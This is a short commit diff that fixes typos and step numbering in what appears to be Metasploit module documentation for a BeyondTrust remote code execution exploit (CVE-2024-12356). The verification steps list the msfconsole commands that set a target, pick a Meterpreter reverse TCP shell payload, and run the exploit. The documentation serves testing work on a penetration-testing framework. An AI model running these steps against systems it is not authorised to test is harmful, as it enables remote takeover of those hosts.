fix typos in docs
This commit is contained in:
@@ -11,13 +11,13 @@ to acquire the relevant software packages.
|
||||
## Verification Steps
|
||||
|
||||
1. Start msfconsole
|
||||
2. `use exploit/linux/http/beyondtrust_rce_cve_2024_12356.`
|
||||
2. `use exploit/linux/http/beyondtrust_rce_cve_2024_12356`
|
||||
3. `set RHOST <TARGET_IP_ADDRESS>`
|
||||
4. `set PAYLOAD cmd/linux/http/x64/meterpreter_reverse_tcp`
|
||||
5. `set LHOST eth0`
|
||||
5. `set LPORT 4444`
|
||||
6. `check`
|
||||
7. `exploit`
|
||||
6. `set LPORT 4444`
|
||||
7. `check`
|
||||
8. `exploit`
|
||||
|
||||
## Options
|
||||
|
||||
|
||||
Reference in New Issue
Block a user